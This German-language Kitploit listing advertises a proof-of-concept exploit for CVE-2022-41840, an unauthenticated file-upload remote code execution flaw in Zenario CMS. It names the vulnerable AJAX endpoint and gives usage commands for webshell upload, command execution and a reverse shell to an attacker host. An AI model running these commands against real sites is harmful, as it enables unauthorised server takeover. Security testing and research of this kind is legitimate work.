Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-41840-PoC — Dies ist der PoC-Exploit für CVE-2022-41840, der Zenario betrifft. | Kitploit
Tools/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

Dies ist der PoC-Exploit für CVE-2022-41840, der Zenario betrifft.

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Zenario CMS 9.3 - Nicht authentifizierter RCE-Exploit

CVE-2022-41840

Eine nicht authentifizierte Schwachstelle zur Remote-Codeausführung (RCE), die Zenario CMS Version 9.3 und früher betrifft. Der Exploit nutzt eine Datei-Upload-Schwachstelle im AJAX-Endpunkt aus, um eine PHP-Webshell hochzuladen und Codeausführung zu erreichen.

Schwachstellendetails

  • CVE: CVE-2022-41840
  • Betroffene Version: Zenario CMS <= 9.3
  • Schwachstellentyp: Nicht authentifizierter Datei-Upload, der zu RCE führt
  • Angriffsvektor: HTTP POST an /zenario/ajax.php
  • Erforderliche Berechtigungen: Keine (nicht authentifiziert)

Verwendung

Interaktive Webshell

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

Einzelne Befehlsausführung

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

Reverse Shell

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

Funktionen

  • Automatischer PHP-Webshell-Upload über den verwundbaren AJAX-Endpunkt
  • Unterstützung mehrerer instanceId-Werte für eine höhere Erfolgsrate
  • JSON- und regexbasierte Pfadextraktion
  • Mehrere Reverse-Shell-Payload-Optionen (bash, python, perl, nc)
  • Vollständig interaktive PTY-Shell mit Terminalunterstützung
  • Webshell-Fallback, falls die Reverse Shell fehlschlägt

Haftungsausschluss

Nur für Bildungszwecke und autorisierte Sicherheitstests.

Dieses Tool wird Sicherheitsforschern und Penetrationstestern zur Verfügung gestellt, um Systeme zu testen, die ihnen gehören oder für die sie eine ausdrückliche Testberechtigung besitzen. Der unbefugte Zugriff auf Computersysteme ist illegal und strengstens untersagt.

Die Betreiber übernehmen keinerlei Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Lizenz

Dieser Code wird zu Bildungszwecken bereitgestellt.

Tool herunterladen